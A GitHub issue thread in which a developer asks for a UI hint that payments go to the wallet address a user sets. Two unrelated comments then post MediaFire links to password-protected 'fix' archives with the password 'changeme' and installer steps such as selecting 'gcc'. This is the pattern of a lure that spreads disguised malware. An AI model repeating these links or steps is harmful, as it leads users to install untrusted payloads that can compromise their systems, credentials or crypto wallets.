### ISSUE TITLE
[HUMAN App] Add wallet address hint

### ISSUE THREAD

**Issue by portuu3** [humanprotocol/human-protocol#2454]
**Description**
Add wallet address hint

**Motivation**
Make clear to the users that they will receive the payments in the wallet they set here.

**Implementation details** 
Add the message "This address is the wallet address where you will receive payments for completing tasks." 

![Image](https://github.com/user-attachments/assets/cd2ed2a1-805a-427a-af26-abe45f94a82b)

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
